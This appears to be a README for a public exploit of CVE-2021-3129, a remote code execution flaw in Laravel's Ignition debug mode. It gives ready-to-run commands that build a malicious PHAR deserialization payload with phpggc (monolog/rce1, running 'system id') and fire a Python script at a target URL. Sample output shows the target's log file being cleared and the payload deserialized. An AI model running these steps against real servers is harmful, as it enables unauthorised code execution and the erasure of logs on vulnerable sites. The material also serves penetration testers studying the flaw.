Laravel vulnerability
Exploit for CVE-2021-3129. Details: https://www.ambionics.io/blog/laravel-debug-rce
Usage
$ php -d 'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
-----------
2021-09-11 10:18:54